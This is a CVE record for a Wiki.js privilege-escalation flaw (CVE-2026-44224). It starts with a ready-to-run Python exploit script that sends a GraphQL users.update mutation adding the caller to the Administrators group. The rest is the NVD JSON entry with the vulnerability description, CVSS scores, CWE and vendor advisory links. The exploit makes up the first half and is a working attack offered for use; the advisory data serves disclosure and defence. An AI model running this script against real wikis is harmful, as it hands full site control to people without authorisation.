CVE-2026-44224

import requests # Exploit Title: Wiki.js < 2.5.313 - Privilege Escalation via GraphQL # Date: 2026-05-12 # Exploit Author: Analyst # Vendor Homepage: https://js.wiki/ # Version: < 2.5.313 # CVE: CVE-2026-44224 def exploit(target_url, attacker_token, attacker_user_id): """ Exploits the users.update GraphQL mutation to escalate privileges. Requires 'manage:users' permission. """ # The Administrators group ID is typically '1' admin_group_id = "1" headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # GraphQL mutation to update the user's groups payload = { "query": """ mutation { users { update( id: "%s" groups: [%s] ) { responseResult { succeeded message } } } } """ % (attacker_user_id, admin_group_id) } try: response = requests.post(f"{target_url}/graphql", json=payload, headers=headers) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:", response.json()) print("[+] If succeeded, re-authenticate to receive Administrative JWT.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Configuration TARGET = "https://wiki.example.com" TOKEN = "YOUR_JWT_TOKEN_WITH_MANAGE_USERS_PERMISSION" USER_ID = "YOUR_USER_ID" exploit(TARGET, TOKEN, USER_ID)

{"cve": {"id": "CVE-2026-44224", "sourceIdentifier": "[email protected]", "published": "2026-05-12T21:16:16.137", "lastModified": "2026-05-14T14:56:13.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wiki.js is an open source wiki app built on Node.js. Prior to 2.5.313, the users.update GraphQL mutation accepts an arbitrary groups array and applies it directly to the database with no validation of the group IDs supplied. The resolver passes the caller's arguments straight to the model without any ownership check or restriction on which groups can be assigned. A user with manage:users — a permission typically delegated to wiki moderators for account management — can set groups:[1] on their own account to self-assign to the Administrators group. After re-authentication, the fresh JWT carries manage:system, granting full site administrator access in a single mutation call. This vulnerability is fixed in 2.5.313."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:requarks:wiki.js:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.313", "matchCriteriaId": "B53C17D2-437E-4C6E-9709-B02D8D67D399"}]}]}], "references": [{"url": "https://github.com/requarks/wiki/security/advisories/GHSA-cq3g-mwrg-v2rv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/requarks/wiki/security/advisories/GHSA-cq3g-mwrg-v2rv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}